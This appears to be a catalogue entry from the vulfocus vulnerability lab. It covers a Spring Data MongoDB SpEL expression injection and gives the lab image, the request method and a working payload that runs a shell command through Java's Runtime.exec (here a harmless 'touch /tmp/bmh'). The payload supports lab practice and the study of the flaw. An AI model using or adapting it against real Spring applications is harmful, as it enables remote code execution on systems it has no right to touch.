Spring Data MongoDB SpEL Expression injection
| ID: | 16462 |
|---|---|
| 标题: | Spring Data MongoDB SpEL Expression injection |
| 描述: | Spring Data MongoDB SpEL Expression injection vulfocus/spring-data-mongo-cve_2022_22890:latest Spring Data MongoDB SpEL Expression injection Spring Data MongoDB 应用程序在使用带有 SpEL 表达式的 @Query 或 @Aggregation-annotated 查询方法时容易受到 SpEL 注入的影响,如果输入未经过过滤,则该表达式包含用于值绑定的查询参数占位符。 请求URI:/ 请求方式:GET 请求参数:name=T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('touch /tmp/bmh') |
| 类型: | WEB |
| 网站: | vulfocus |
| 题目链接: | https://vulfocus.cn |
| 赛事: | None |
| 年度: | None |
| Flag值: | None |
| writeup: | 登录 https://vulfocus.cn 搜索Spring Data MongoDB SpEL Expression injection |